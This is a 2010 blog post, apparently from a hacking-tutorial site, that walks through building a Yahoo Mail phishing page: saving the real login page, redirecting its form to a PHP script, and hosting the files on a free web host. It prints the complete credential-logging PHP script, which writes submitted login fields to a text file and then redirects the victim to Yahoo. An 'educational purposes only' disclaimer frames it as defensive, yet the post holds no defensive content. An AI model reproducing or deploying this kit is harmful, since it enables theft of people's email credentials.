Search This Blog

Page underconstruction..!!

Sorry Guys for not updating this page regularly due to some reasons. Page is undercontruction. Please wait patiently until the softwares get synchronized with the server...
More torrents and hack guides and tutorials are to be uploaded soon...

Thursday, November 25, 2010

Phishing Site


This is only for educational purposes and not for any sort of exploit. Users are warned before using this. They will be held responsible for thier own act. Purpose of this blog is to teach you how to tackle the phishing sites and how they are managed by the owners of the phishing sites.

To create a phishing site first you must get yourself registered for free in http://www.t35.com. Get a website name. Once you are done then just follow simple step.

You need 3 files to complete this procedure :  (PHISHING YAHOO PAGE)

I. Yahoo page :

1. Yahoo mail (html or php file) : you can get this file by opening http://www.mail.yahoo.com. Right click anywhere on the page and select save as option and filename - yahoo.html.
2. When you save the file. Go to that location select the file and right click with the mouse and select open with -> Notepad.
3. When the webpage opens press Ctrl+F and type "action" without the quotes. Now when you get this action replace the contents infront of the action button as mail.php.

II. Mail.php page :

1. Open a notepad.
2. Paste the following as it is after the colon mark :
    <?php
header("Location: http://www.mail.yahoo.com");
$handle = fopen("log.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>


3. Save this file as mail.php

III. Log file

1. Open a notepad and save it blank as log.txt

Now you are done. You have all the three files that is yahoo.html, mail.php, log.txt.

open up your members area in http://www.t35.com and upload these 3 files. And now you can access these three files from anywhere on the net.


Guys who have still difficulty understanding it or having problem creating or uploading files and opening accounts can further email their problems on : blizz56@live.com

Comments and suggestions are most welcome.

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.